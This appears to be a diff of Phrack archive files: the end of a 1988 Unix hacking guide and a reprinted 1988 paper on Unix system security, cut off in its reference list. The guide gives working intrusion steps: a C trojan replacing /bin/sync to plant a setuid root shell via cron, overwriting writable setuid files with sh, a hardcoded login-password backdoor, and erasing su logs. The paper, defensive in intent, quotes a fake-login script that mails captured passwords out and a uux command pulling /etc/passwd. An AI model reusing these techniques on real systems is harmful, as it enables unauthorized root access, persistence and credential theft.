mark those. All those little weird brands (i.e., DEC's Ultrix, Xenix, and
|
||||
so on) can go to hell.
|
||||
|
||||
|
||||
Security: (Improving yours.)
|
||||
|
||||
-Whenever logging onto a system, you should always do the following:
|
||||
$ who -u
|
||||
$ ps -ef
|
||||
$ ps -u root
|
||||
|
||||
or BSD:
|
||||
$ who; w; ps uaxg
|
||||
This prints out who is on, who is active, what is going on presently,
|
||||
everything in the background, and so on.
|
||||
|
||||
And the ever popular:
|
||||
$ find / -name "*log*" -print
|
||||
This lists out all the files with the name 'log' in it. If you do find a
|
||||
process that is logging what you do, or an odd log file, change it as soon
|
||||
as you can.
|
||||
|
||||
If you think someone may be looking at you and you don't want to leave
|
||||
(Useful for school computers) then go into something that allows shell
|
||||
breaks, or use redirection to your advantage:
|
||||
$ cat < /etc/passwd
|
||||
That puts 'cat' on the ps, not 'cat /etc/passwd'.
|
||||
|
||||
If you're running a setuid process, and don't want it to show up on a ps
|
||||
(Not a very nice thing to have happen), then:
|
||||
$ super_shell
|
||||
# exec sh
|
||||
Runs the setuid shell (super_shell) and puts something 'over' it. You may
|
||||
also want to run 'sh' again if you are nervous, because if you break out of
|
||||
an exec'ed process, you die. Neat, huh?
|
||||
|
||||
|
||||
Improving your id:
|
||||
|
||||
-First on, you should issue the command 'id' & it will tell you you your
|
||||
uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your
|
||||
id [whoami] and your euid [ls -l].), terribly useful for checking on setuid
|
||||
programs to see if you have root euid privs. Also, do this:
|
||||
$ find / -perm -4000 -exec /bin/ls -lad {} ";"
|
||||
Yes, this finds and does an extended list of all the files that have the
|
||||
setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of
|
||||
them look nonstandard, play with them, you never can tell what a ^| will do
|
||||
to them sometimes. Also, if any are writeable and executable, copy sh over
|
||||
them, and you'll have a setuid root shell. Just be sure to copy whatever
|
||||
was there back, otherwise your stay will probably be shortened a bit.
|
||||
|
||||
-What, you have the bin passwd?
|
||||
|
||||
Well, game over. You have control of the system. Everything in the bin
|
||||
directory is owned by bin (with the exception of a few things), so you can
|
||||
modify them at will. Since cron executes a few programs as root every once
|
||||
in a while, such as /bin/sync, try this:
|
||||
|
||||
main()
|
||||
{
|
||||
if (getuid()==0 || getuid()==0) {
|
||||
system("cp /bin/sh /tmp/sroot");
|
||||
system("chmod 4777 /tmp/sroot"); }
|
||||
sync();
|
||||
}
|
||||
|
||||
$ cc file.c
|
||||
$ cp /bin/sync /tmp/sync.old
|
||||
$ mv a.out /bin/sync
|
||||
$ rm file.c
|
||||
|
||||
Now, as soon as cron runs /bin/sync, you'll have a setuid shell in
|
||||
/tmp/sroot. Feel free to hide it.
|
||||
|
||||
-the 'at' & 'cron' commands:
|
||||
|
||||
Look at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at'
|
||||
(check by typing 'at'), and 'lasttimedone' is writable, then: submit a
|
||||
blank 'at' job, edit 'lastimedone' to do what you want it to do, and move
|
||||
lasttimedone over your entry (like 88.00.00.00). Then the commands you put
|
||||
in lasttimedone will be ran as that file's owner. Cron: in
|
||||
/usr/spool/cron/cronjobs, there are a list of people running cron jobs.
|
||||
Cat root's, and see if he runs any of the programs owned by you (Without
|
||||
doing a su xxx -c "xxx"). For matter, check all the crons. If you can
|
||||
take one system login, you should be able to get the rest, in time.
|
||||
|
||||
-The disk files.
|
||||
|
||||
These are rather odd. If you have read permission on the disks in /dev,
|
||||
then you can read any file on the system. All you have to do is find it in
|
||||
there somewhere. If the disk is writeable, if you use /etc/fsbd, you can
|
||||
modify any file on the system into whatever you want, such as by changing
|
||||
the permissions on /bin/sh to 4555. Since this is pretty difficult to
|
||||
understand (and I don't get it fully), then I won't bother with it any
|
||||
more.
|
||||
|
||||
-Trivial su.
|
||||
|
||||
You know with su you can log into anyone else's account if you know their
|
||||
passwords or if you're root. There are still a number of system 5's that
|
||||
have uid 0, null passwd, rsh accounts on them. Just be sure to remove your
|
||||
entry in /usr/adm/sulog.
|
||||
|
||||
-Trojan horses? On Unix?
|
||||
|
||||
Yes, but because of the shell variable PATH, we are generally out of luck,
|
||||
because it usually searches /bin and /usr/bin first. However, if the first
|
||||
field is a colon, files in the present directory are searched first. Which
|
||||
means if you put a modified version of 'ls' there, hey. If this isn't the
|
||||
case, you will have to try something more blatant, like putting it in a
|
||||
game (see Shooting Shark's file a while back). If you have a system login,
|
||||
you may be able to get something done like that. See cron.
|
||||
|
||||
|
||||
Taking over:
|
||||
|
||||
Once you have root privs, you should read all the mail in /usr/mail, just
|
||||
to sure nothing interesting is up, or anyone is passing another systems
|
||||
passwds about. You may want to add another entry to the passwd file, but
|
||||
that's relatively dangerous to the life of your machine. Be sure not to
|
||||
have anything out of the ordinary as the entry (i.e., No uid 0).
|
||||
|
||||
Get a copy of the login program (available at your nearest decent BBS, I
|
||||
hope) of that same version of Unix, and modify it a bit: on system 5,
|
||||
here's a modification pretty common: in the routine to check correct
|
||||
passwds, on the line before the actual pw check, put a if
|
||||
(!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling
|
||||
you to log on as any valid user that isn't uid 0 (On system 5).
|
||||
|
||||
|
||||
Neato things:
|
||||
|
||||
-Have you ever been on a system that you couldn't get root or read the
|
||||
Systems/L.sys file? Well, this is a cheap way to overcome it: 'uuname'
|
||||
will list all machines reachable by your Unix, then (Assuming they aren't
|
||||
Direct, and the modem is available):
|
||||
$ cu -d host.you.want [or]
|
||||
$ uucico -x99 -r1 -shost.you.want
|
||||
Both will do about the same for us. This will fill your screen with lots
|
||||
of trivial material, but will eventually get to the point of printing the
|
||||
phone number to the other system. -d enables the cu diagnostics, -x99
|
||||
enables the uucico highest debug, and -R1 says 'uucp master'.
|
||||
|
||||
Back a year or two, almost everywhere had their uucp passwd set to the same
|
||||
thing as their nuucp passwd (Thanks to the Systems file), so it was a
|
||||
breeze getting in. Even nowadays, some places do it.. You never can tell.
|
||||
|
||||
-Uucp:
|
||||
|
||||
I personally don't like the uucp things. Uucico and uux are limited by the
|
||||
Permissions file, and in most cases, that means you can't do anything
|
||||
except get & take from the uucppublic dirs. Then again, if the
|
||||
permission/L.cmd is blank, you should be able to take what files that you
|
||||
want. I still don't like it.
|
||||
|
||||
-Sending mail:
|
||||
|
||||
Sometimes, the mail program checks only the shell var LOGNAME, so change
|
||||
it, export it, and you may be able to send mail as anyone. (Mainly early
|
||||
system 5's.)
|
||||
$ LOGNAME="root";export LOGNAME
|
||||
|
||||
-Printing out all the files on the system:
|
||||
|
||||
Useful if you're interested in the filenames.
|
||||
$ find / -print >file_list&
|
||||
And then do a 'grep text file_list' to find any files with 'text' in their
|
||||
names. Like grep [.]c file_list, grep host file_list....
|
||||
|
||||
-Printing out all restricted files:
|
||||
|
||||
Useful when you have root. As a normal user, do:
|
||||
$ find / -print >/dev/null&
|
||||
This prints out all nonaccessable directories, so become root and see what
|
||||
they are hiding.
|
||||
|
||||
-Printing out all the files in a directory:
|
||||
|
||||
Better looking than ls -R:
|
||||
$ find . -print
|
||||
It starts at the present dir, and goes all the way down. Catches all
|
||||
'.files', too.
|
||||
|
||||
-Rsh:
|
||||
|
||||
Well in the case of having an account with rsh only, check your 'set'. If
|
||||
SHELL is not /bin/sh, and you are able to run anything with a shell escape
|
||||
(ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'.
|
||||
If you have write permission on your .profile, change it, because rsh is
|
||||
ran after checking profile.
|
||||
|
||||
-Humor:
|
||||
|
||||
On a system 5, do a:
|
||||
$ cat "food in cans"
|
||||
|
||||
or on a csh, do:
|
||||
% hey unix, got a match?
|
||||
|
||||
Well, I didn't say it was great.
|
||||
|
||||
|
||||
Password hacking:
|
||||
|
||||
-Salt:
|
||||
|
||||
In a standard /etc/passwd file, passwords are 13 characters long. This is
|
||||
an 11 char encrypted passwd and a 2 char encryption modifier (salt), which
|
||||
is used to change the des algorithm in one of 4096<?> ways. Which means
|
||||
there is no decent way to go and reverse hack it. Yet.
|
||||
|
||||
On normal system 5 Unix, passwords are supposed to be 6-8 characters long
|
||||
and have both numeric and alphabetic characters in them, which makes a
|
||||
dictionary hacker pretty worthless. However, if a user keeps insisting his
|
||||
password is going to be 'dog,' usually the system will comply (depending on
|
||||
version). I have yet to try it, but having the hacker try the normal
|
||||
entry, and then the entry terminated by [0-9] is said to have remarkable
|
||||
results, if you don't mind the 10-fold increase in time.
|
||||
|
||||
|
||||
Final notes:
|
||||
|
||||
Yes, I have left a lot out. That seems to be the rage nowadays.. If you
|
||||
have noticed something wrong, or didn't like this, feel free to tell me.
|
||||
If you can find me.
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
Hi Ho. Here ends part one. <Of one?>
|
||||
-------------------------------------------------------------------------------
|
||||
Produced and directed by: Urvile & Necron 99
|
||||
----------------------------------------------------------- (c) ToK inc., 1988
|
480
phrack18/7.txt
Normal file
480
phrack18/7.txt
Normal file
|
@ -0,0 +1,480 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #7 of 11
|
||||
|
||||
+--------------------------------------+
|
||||
| "Unix System Security Issues" |
|
||||
| Typed by: |
|
||||
| Whisky |
|
||||
| (from Holland, Europe) |
|
||||
+--------------------------------------+
|
||||
| From |
|
||||
| Information Age |
|
||||
| Vol. 11, Number 2, April 1988 |
|
||||
| Written By: |
|
||||
| Michael J. Knox and Edward D. Bowden |
|
||||
+--------------------------------------+
|
||||
|
||||
Note: This file was sent to me from a friend in Holland. I felt
|
||||
that it would be a good idea to present this file to the
|
||||
UNIX-hacker community, to show that hackers don't always
|
||||
harm systems, but sometimes look for ways to secure flaws
|
||||
in existing systems. -- Jester Sluggo !!
|
||||
|
||||
There are a number of elements that have lead to the popularity of the Unix
|
||||
operating system in the world today. The most notable factors are its
|
||||
portability among hardware platforms and the interactive programming
|
||||
environment that it offers to users. In fact, these elements have had much to
|
||||
do with the successful evolution of the Unix system in the commercial market
|
||||
place. (1, 2)
|
||||
As the Unix system expands further into industry and government, the need to
|
||||
handle Unix system security will no doubt become imperative. For example, the
|
||||
US government is committing several million dollars a year for the Unix system
|
||||
and its supported hardware. (1) The security requirements for the government
|
||||
are tremendous, and one can only guess at the future needs of security in
|
||||
industry.
|
||||
In this paper, we will cover some of the more fundamental security risks in
|
||||
the Unix system. Discussed are common causes of Unix system compromise in
|
||||
such areas as file protection, password security, networking and hacker
|
||||
violations. In our conclusion, we will comment upon ongoing effects in Unix
|
||||
system security, and their direct influence on the portability of the Unix
|
||||
operating system.
|
||||
|
||||
FILE AND DIRECTORY SECURITY
|
||||
|
||||
In the Unix operating system environment, files and directories are organized
|
||||
in a tree structure with specific access modes. The setting of these modes,
|
||||
through permission bits (as octal digits), is the basis of Unix system
|
||||
security. Permission bits determine how users can access files and the type
|
||||
of access they are allowed. There are three user access modes for all Unix
|
||||
system files and directories: the owner, the group, and others. Access to
|
||||
read, write and execute within each of the usertypes is also controlled by
|
||||
permission bits (Figure 1). Flexibility in file security is convenient, but
|
||||
it has been criticized as an area of system security compromise.
|
||||
|
||||
|
||||
Permission modes
|
||||
OWNER GROUP OTHERS
|
||||
------------------------------------------------------------
|
||||
rwx : rwx : rwx
|
||||
------------------------------------------------------------
|
||||
r=read w=write x=execute
|
||||
|
||||
-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
|
||||
drwx------ 2 sam A1 2 May 01 12:01 directory
|
||||
|
||||
FIGURE 1. File and directory modes: File shows Bob as the owner, with read
|
||||
and write permission. Group has write permission, while Others has read and
|
||||
execute permission. The directory gives a secure directory not readable,
|
||||
writeable, or executable by Group and Others.
|
||||
|
||||
|
||||
Since the file protection mechanism is so important in the Unix operating
|
||||
system, it stands to reason that the proper setting of permission bits is
|
||||
required for overall security. Aside from user ignorance, the most common
|
||||
area of file compromise has to do with the default setting of permission bits
|
||||
at file creation. In some systems the default is octal 644, meaning that only
|
||||
the file owner can write and read to a file, while all others can only read
|
||||
it. (3) In many "open" environments this may be acceptable. However, in
|
||||
cases where sensitive data is present, the access for reading by others should
|
||||
be turned off. The file utility umask does in fact satisfy this requirement.
|
||||
A suggested setting, umask 027, would enable all permission for the file
|
||||
owner, disable write permission to the group, and disable permissions for all
|
||||
others (octal 750). By inserting this umask command in a user .profile or
|
||||
.login file, the default will be overwritten by the new settings at file
|
||||
creation.
|
||||
The CHMOD utility can be used to modify permission settings on files and
|
||||
directories. Issuing the following command,
|
||||
|
||||
chmod u+rwd,g+rw,g-w,u-rwx file
|
||||
|
||||
will provide the file with the same protection as the umask above (octal 750).
|
||||
Permission bits can be relaxed with chmod at a later time, but at least
|
||||
initially, the file structure can be made secure using a restrictive umask.
|
||||
By responsible application of such utilities as umask and chmod, users can
|
||||
enhance file system security. The Unix system, however, restricts the
|
||||
security defined by the user to only owner, group and others. Thus, the owner
|
||||
of the file cannot designate file access to specific users. As Kowack and
|
||||
Healy have pointed out, "The granularity of control that (file security)
|
||||
mechanisms is often insufficient in practice (...) it is not possible to grant
|
||||
one user write protection to a directory while granting another read
|
||||
permission to the same directory. (4) A useful file security file security
|
||||
extension to the Unix system might be Multics style access control lists.
|
||||
With access mode vulnerabilities in mind, users should pay close attention
|
||||
to files and directories under their control, and correct permissions whenever
|
||||
possible. Even with the design limitations in mode granularity, following a
|
||||
safe approach will ensure a more secure Unix system file structure.
|
||||
|
||||
SUID and SGID
|
||||
|
||||
The set user id (suid) and set group id (sgid) identify the user and group
|
||||
ownership of a file. By setting the suid or sgid permission bits of an
|
||||
executable file, other users can gain access to the same resources (via the
|
||||
executable file) as that of the real file's owner.
|
||||
|
||||
For Example:
|
||||
|
||||
Let Bob's program bob.x be an executable file accessible to others. When Mary
|
||||
executes bob.x, Mary becomes the new program owner. If during program
|
||||
execution bob.x requests access to file browse.txt, then Mary must have
|
||||
previous read or write permission to browse.txt. This would allow Mary and
|
||||
everyone else total access to the contents of browse.txt, even when she is not
|
||||
running bob.x. By turning on the suid bit of bob.x, Mary will have the same
|
||||
access permissions to browse.txt as does the program's real owner, but she
|
||||
will only have access to browse.txt during the execution of bob.x. Hence, by
|
||||
incorporating suid or sgid, unwelcome browsers will be prevented from
|
||||
accessing files like browse.txt.
|
||||
|
||||
Although this feature appears to offer substantial access control to Unix
|
||||
system files, it does have one critical drawback. There is always the chance
|
||||
that the superuser (system administrator) may have a writable file for others
|
||||
that is also set with suid. With some modification in the file's code (by a
|
||||
hacker), an executable file like this would enable a user to become a
|
||||
superuser. Within a short period of time this violator could completely
|
||||
compromise system security and make it inaccessible, even to other superusers.
|
||||
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
|
||||
root is better than knowing the root password".
|
||||
To compensate for this security threat, writable suid files should be sought
|
||||
out and eliminated by the system administrator. Reporting of such files by
|
||||
normal users is also essential in correcting existing security breaches.
|
||||
|
||||
DIRECTORIES
|
||||
|
||||
Directory protection is commonly overlooked component of file security in the
|
||||
Unix system. Many system administrators and users are unaware of the fact,
|
||||
that "publicly writable directories provide the most opportunities for
|
||||
compromising the Unix system security" (6). Administrators tend to make these
|
||||
"open" for users to move around and access public files and utilities. This
|
||||
can be disastrous, since files and other subdirectories within writable
|
||||
directories can be moved out and replaced with different versions, even if
|
||||
contained files are unreadable or unwritable to others. When this happens, an
|
||||
unscrupulous user or a "password breaker" may supplant a Trojan horse of a
|
||||
commonly used system utility (e.g. ls, su, mail and so on). For example,
|
||||
imagine
|
||||
|
||||
For example:
|
||||
|
||||
Imagine that the /bin directory is publicly writable. The perpetrator could
|
||||
first remove the old su version (with rm utility) and then include his own
|
||||
fake su to read the password of users who execute this utility.
|
||||
|
||||
Although writable directories can destroy system integrity, readable ones
|
||||
can be just as damaging. Sometimes files and directories are configured to
|
||||
permit read access by other. This subtle convenience can lead to unauthorized
|
||||
disclosure of sensitive data: a serious matter when valuable information is
|
||||
lost to a business competitor.
|
||||
As a general rule, therefore, read and write access should be removed from
|
||||
all but system administrative directories. Execute permission will allow
|
||||
access to needed files; however, users might explicitly name the file they
|
||||
wish to use. This adds some protection to unreadable and unwritable
|
||||
directories. So, programs like lp file.x in an unreadable directory /ddr will
|
||||
print the contents of file.x, while ls/ddr would not list the contents of that
|
||||
directory.
|
||||
|
||||
PATH VARIABLE
|
||||
|
||||
PATH is an environment variable that points to a list of directories, which
|
||||
are searched when a file is requested by a process. The order of that search
|
||||
is indicated by the sequence of the listed directories in the PATH name. This
|
||||
variable is established at user logon and is set up in the users .profile of
|
||||
.login file.
|
||||
If a user places the current directory as the first entry in PATH, then
|
||||
programs in the current directory will be run first. Programs in other
|
||||
directories with the same name will be ignored. Although file and directory
|
||||
access is made easier with a PATH variable set up this way, it may expose the
|
||||
user to pre-existing Trojan horses.
|
||||
To illustrate this, assume that a Trojan horse, similar to the cat utility,
|
||||
contains an instruction that imparts access privileges to a perpetrator. The
|
||||
fake cat is placed in a public directory /usr/his where a user often works.
|
||||
Now if the user has a PATH variable with the current directory first, and he
|
||||
enters the cat command while in /usr/his, the fake cat in /usr/his would be
|
||||
executed but not the system cat located in /bin.
|
||||
In order to prevent this kind of system violation, the PATH variable must be
|
||||
correctly set. First, if at all possible, exclude the current directory as
|
||||
the first entry in the PATH variable and type the full path name when invoking
|
||||
Unix system commands. This enhances file security, but is more cumbersome to
|
||||
work with. Second, if the working directory must be included in the PATH
|
||||
variable, then it should always be listed last. In this way, utilities like
|
||||
vi, cat, su and ls will be executed first from systems directories like /bin
|
||||
and /usr/bin before searching the user's working directory.
|
||||
|
||||
PASSWORD SECURITY
|
||||
|
||||
User authentication in the Unix system is accomplished by personal passwords.
|
||||
Though passwords offer an additional level of security beyond physical
|
||||
constraints, they lend themselves to the greatest area of computer system
|
||||
compromise. Lack of user awareness and responsibility contributes largely to
|
||||
this form of computer insecurity. This is true of many computer facilities
|
||||
where password identification, authentication and authorization are required
|
||||
for the access of resources - and the Unix operating system is no exception.
|
||||
Password information in many time-sharing systems are kept in restricted
|
||||
files that are not ordinarily readable by users. The Unix system differs in
|
||||
this respect, since it allows all users to have read access to the /etc/passwd
|
||||
file (FIGURE 2) where encrypted passwords and other user information are
|
||||
stored. Although the Unix system implements a one-way encryption method, and
|
||||
in most systems a modified version of the data encryption standard (DES),
|
||||
password breaking methods are known. Among these methods, brute-force attacks
|
||||
are generally the least effective, yet techniques involving the use of
|
||||
heuristics (good guesses and knowledge about passwords) tend to be successful.
|
||||
For example, the /etc/passwd file contains such useful information as the
|
||||
login name and comments fields. Login names are especially rewarding to the
|
||||
"password breaker" since many users will use login variants for passwords
|
||||
(backward spelling, the appending of a single digit etc.). The comment field
|
||||
often contains items such as surname, given name, address, telephone number,
|
||||
project name and so on. To quote Morris and Grampp (7) in their landmark
|
||||
paper on Unix system security:
|
||||
|
||||
[in the case of logins]
|
||||
|
||||
The authors made a survey of several dozen local machines, using as trial
|
||||
passwords a collection of the 20 most common female first names, each
|
||||
followed by a single digit. The total number of passwords tried was,
|
||||
therefore, 200. At least one of these 200 passwords turned out to be a
|
||||
valid password on every machine surveyed.
|
||||
|
||||
[as for comment fields]
|
||||
|
||||
(...) if an intruder knows something about the people using a machine, a
|
||||
whole new set of candidates is available. Family and friend's names, auto
|
||||
registration numbers, hobbies, and pets are particularly productive
|
||||
categories to try interactively in the unlikely event that a purely
|
||||
mechanical scan of the password file turns out to be disappointing.
|
||||
|
||||
Thus, given a persistent system violator, there is a strong evidence, that he
|
||||
will find some information about users in the /etc/passwd file. With this in
|
||||
mind, it is obvious that a password file should be unreadable to everyone
|
||||
except those in charge of system administration.
|
||||
|
||||
|
||||
root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
|
||||
mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin
|
||||
|
||||
FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms.
|
||||
|
||||
|
||||
Resolution of the /etc/passwd file's readability does not entirely solve the
|
||||
basic problem with passwords. Educating users and administrators is necessary
|
||||
to assure proper password utilization. First, "good passwords are those that
|
||||
are at least six characters long, aren't based on personal information, and
|
||||
have some non-alphabetic (especially control) characters in them: 4score,
|
||||
my_name, luv2run" (8). Secondly, passwords should be changed periodically but
|
||||
users should avoid alternating between two passwords. Different passwords for
|
||||
different machines and files will aid in protecting sensitive information.
|
||||
Finally, passwords should never be available to unauthorized users. Reduction
|
||||
of user ignorance about poor password choice will inevitably make a system
|
||||
more secure.
|
||||
|
||||
NETWORK SECURITY
|
||||
|
||||
UUCP system
|
||||
The most common Unix system network is the UUCP system, which is a group of
|
||||
programs that perform the file transfers and command execution between remote
|
||||
systems. (3) The problem with the UUCP system is that users on the network
|
||||
may access other users' files without access permission. As stated by Nowitz
|
||||
(9),
|
||||
|
||||
The uucp system, left unrestricted, will let any outside user execute
|
||||
commands and copy in/out any file that is readable/writable by a uucp login
|
||||
user. It is up to the individual sites to be aware of this, and apply the
|
||||
protections that they feel free are necessary.
|
||||
|
||||
This emphasizes the importance of proper implementation by the system
|
||||
administrator.
|
||||
There are four UUCP system commands to consider when looking into network
|
||||
security with the Unix system. The first is uucp, a command used to copy
|
||||
files between two Unix systems. If uucp is not properly implemented by the
|
||||
system administrator, any outside user can execute remote commands and copy
|
||||
files from another login user. If the file name on another system is known,
|
||||
one could use the uucp command to copy files from that system to their system.
|
||||
For example:
|
||||
|
||||
%uucp system2!/main/src/hisfile myfile
|
||||
|
||||
will copy hisfile from system2 in the directory /main/src to the file myfile
|
||||
in the current local directory. If file transfer restrictions exist on either
|
||||
system, hisfile would not be sent. If there are no restrictions, any file
|
||||
could be copied from a remote user - including the password file. The
|
||||
following would copy the remote system /etc/passwd file to the local file
|
||||
thanks:
|
||||
|
||||
%uucp system2!/etc/passwd thanks
|
||||
|
||||
System administrators can address the uucp matter by restricting uucp file
|
||||
transfers to the directory /user/spool/uucppublic. (8) If one tries to
|
||||
transfer a file anywhere else, a message will be returned saying "remote
|
||||
access to path/file denied" and no file transfer will occur.
|
||||
The second UUCP system command to consider is the uux. Its function is to
|
||||
execute commands on remote Unix computers. This is called remote command
|
||||
execution and is most often used to send mail between systems (mail executes
|
||||
the uux command internally).
|
||||
The ability to execute a command on another system introduces a serious
|
||||
security problem if remote command execution is not limited. As an example, a
|
||||
system should not allow users from another system to perform the following:
|
||||
|
||||
%uux "system1!cat</etc/passwd>/usr/spool/uucppublic"
|
||||
|
||||
which would cause system1 to send its /etc/passwd file to the system2 uucp
|
||||
public directory. The user of system2 would now have access to the password
|
||||
file. Therefore, only a few commands should be allowed to execute remotely.
|
||||
Often the only command allowed to run uux is rmail, the restricted mail
|
||||
program.
|
||||
The third UUCP system function is the uucico (copy in / copy out) program.
|
||||
It performs the true communication work. Uucp or uux does not actually call
|
||||
up other systems; instead they are queued and the uucico program initiates the
|
||||
remote processes. The uucico program uses the file /usr/uucp/USERFILE to
|
||||
determine what files a remote system may send or receive. Checks for legal
|
||||
files are the basis for security in USERFILE. Thus the system administrator
|
||||
should carefully control this file.
|
||||
In addition, USERFILE controls security between two Unix systems by allowing
|
||||
a call-back flag to be set. Therefore, some degree of security can be
|
||||
achieved by requiring a system to check if the remote system is legal before a
|
||||
call-back occurs.
|
||||
The last UUCP function is the uuxqt. It controls the remote command
|
||||
execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
|
||||
which commands will run in response to a remote execution request. For
|
||||
example, if one wishes to use the electronic mail feature, then the L.cmd file
|
||||
will contain the line rmail. Since uuxqt determines what commands will be
|
||||
allowed to execute remotely, commands which may compromise system security
|
||||
should not be included in L.cmd.
|
||||
|
||||
CALL THE UNIX SYSTEM
|
||||
|
||||
In addition to UUCP network commands, one should also be cautious of the cu
|
||||
command (call the Unix system). Cu permits a remote user to call another
|
||||
computer system. The problem with cu is that a user on a system with a weak
|
||||
security can use cu to connect to a more secure system and then install a
|
||||
Trojan horse on the stronger system. It is apparent that cu should not be
|
||||
used to go from a weaker system to a stronger one, and it is up to the system
|
||||
administrator to ensure that this never occurs.
|
||||
|
||||
LOCAL AREA NETWORKS
|
||||
|
||||
With the increased number of computers operating under the Unix system, some
|
||||
consideration must be given to local area networks (LANs). Because LANs are
|
||||
designed to transmit files between computers quickly, security has not been a
|
||||
priority with many LANs, but there are secure LANs under development. It is
|
||||
the job of the system manager to investigate security risks when employing
|
||||
LANs.
|
||||
|
||||
OTHER AREAS OF COMPROMISE
|
||||
|
||||
There are numerous methods used by hackers to gain entry into computer
|
||||
systems. In the Unix system, Trojan horses, spoofs and suids are the primary
|
||||
weapons used by trespassers.
|
||||
Trojan horses are pieces of code or shell scripts which usually assume the
|
||||
role of a common utility but when activated by an unsuspecting user performs
|
||||
some unexpected task for the trespasser. Among the many different Trojan
|
||||
horses, it is the su masquerade that is the most dangerous to the Unix system.
|
||||
Recall that the /etc/passwd file is readable to others, and also contains
|
||||
information about all users - even root users. Consider what a hacker could
|
||||
do if he were able to read this file and locate a root user with a writable
|
||||
directory. He might easily plant a fake su that would send the root password
|
||||
back to the hacker. A Trojan horse similar to this can often be avoided when
|
||||
various security measures are followed, that is, an etc/passwd file with
|
||||
limited read access, controlling writable directories, and the PATH variable
|
||||
properly set.
|
||||
A spoof is basically a hoax that causes an unsuspecting victim to believe
|
||||
that a masquerading computer function is actually a real system operation. A
|
||||
very popular spool in many computer systems is the terminal-login trap. By
|
||||
displaying a phoney login format, a hacker is able to capture the user's
|
||||
password.
|
||||
Imagine that a root user has temporarily deserted his terminal. A hacker
|
||||
could quickly install a login process like the one described by Morris and
|
||||
Grampp (7):
|
||||
|
||||
echo -n "login:"
|
||||
read X
|
||||
stty -echo
|
||||
echo -n "password:"
|
||||
read Y
|
||||
echo ""
|
||||
stty echo
|
||||
echo %X%Y|mail outside|hacker&
|
||||
sleep 1
|
||||
echo Login incorrect
|
||||
stty 0>/dev/tty
|
||||
|
||||
We see that the password of the root user is mailed to the hacker who has
|
||||
completely compromised the Unix system. The fake terminal-login acts as if
|
||||
the user has incorrectly entered the password. It then transfers control over
|
||||
to the stty process, thereby leaving no trace of its existence.
|
||||
Prevention of spoofs, like most security hazards, must begin with user
|
||||
education. But an immediate solution to security is sometimes needed before
|
||||
education can be effected. As for terminal-login spoofs, there are some
|
||||
keyboard-locking programs that protect the login session while users are away
|
||||
from their terminals. (8, 10) These locked programs ignore keyboard-generated
|
||||
interrupts and wait for the user to enter a password to resume the terminal
|
||||
session.
|
||||
Since the suid mode has been previously examined in the password section, we
|
||||
merely indicate some suid solutions here. First, suid programs should be used
|
||||
is there are no other alternatives. Unrestrained suids or sgids can lead to
|
||||
system compromise. Second, a "restricted shell" should be given to a process
|
||||
that escapes from a suid process to a child process. The reason for this is
|
||||
that a nonprivileged child process might inherit privileged files from its
|
||||
parents. Finally, suid files should be writable only by their owners,
|
||||
otherwise others may have access to overwrite the file contents.
|
||||
It can be seen that by applying some basic security principles, a user can
|
||||
avoid Trojan horses, spoofs and inappropriate suids. There are several other
|
||||
techniques used by hackers to compromise system security, but the use of good
|
||||
judgement and user education may go far in preventing their occurrence.
|
||||
|
||||
CONCLUSION
|
||||
|
||||
Throughout this paper we have discussed conventional approaches to Unix system
|
||||
security by way of practical file management, password protection, and
|
||||
networking. While it can be argued that user education is paramount in
|
||||
maintaining Unix system security (11) factors in human error will promote some
|
||||
degree of system insecurity. Advances in protection mechanisms through
|
||||
better-written software (12), centralized password control (13) and
|
||||
identification devices may result in enhanced Unix system security.
|
||||
The question now asked applies to the future of Unix system operating. Can
|
||||
existing Unix systems accommodate the security requirements of government and
|
||||
industry? It appears not, at least for governmental security projects. By
|
||||
following the Orange Book (14), a government graded classification of secure
|
||||
computer systems, the Unix system is only as secure as the C1 criterion. A C1
|
||||
system, which has a low security rating (D being the lowest) provides only
|
||||
discretionary security protection (DSP) against browsers or non-programmer
|
||||
users. Clearly this is insufficient as far as defense or proprietary security
|
||||
is concerned. What is needed are fundamental changes to the Unix security
|
||||
system. This has been recognized by at least three companies, AT&T, Gould and
|
||||
Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the
|
||||
kernel and file system in order to produce a C2 rated Unix operating system.
|
||||
To achieve this, however, they have had to sacrifice some of the portability
|
||||
of the Unix system. It is hoped that in the near future a Unix system with an
|
||||
A1 classification will be realized, though not at the expense of losing its
|
||||
valued portability.
|
||||
|
||||
REFERENCES
|
||||
|
||||
1 Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
|
||||
pp 50-63
|
||||
2 Waite, M et al. "Unix system V primer" USA (1984)
|
||||
3 Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
|
||||
4 Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
|
||||
Vol 18 (26 September 1984) pp 27-28
|
||||
5 Farrow, R "Security issues and strategies for users" Unix/World
|
||||
(April 1986) pp 65-71
|
||||
6 Farrow, R "Security for superusers, or how to break the Unix system"
|
||||
Unix/World (May 1986) pp 65-70
|
||||
7 Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
|
||||
Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
|
||||
8 Wood, P H and Kochan, S G "Unix system security" USA (1985)
|
||||
9 Nowitz, D A "UUCP Implementation description: Unix programmer's manual
|
||||
Sec. 2" AT&T Bell Laboratories, USA (1984)
|
||||
10 Thomas, R "Securing your terminal: two approaches" Unix/World
|
||||
(April 1986) pp 73-76
|
||||
11 Karpinski, D "Security round table (Part 1)" Unix Review
|
||||
(October 1984) p 48
|
||||
12 Karpinski, D "Security round table (Part 2)" Unix Review
|
||||
(October 1984) p 48
|
||||
13 Lobel, J "Foiling the system breakers: computer security and access
|
||||
control" McGraw-Hill, USA (1986)
|
||||
14 National Computer Security Center "Department of Defense trusted
|
||||
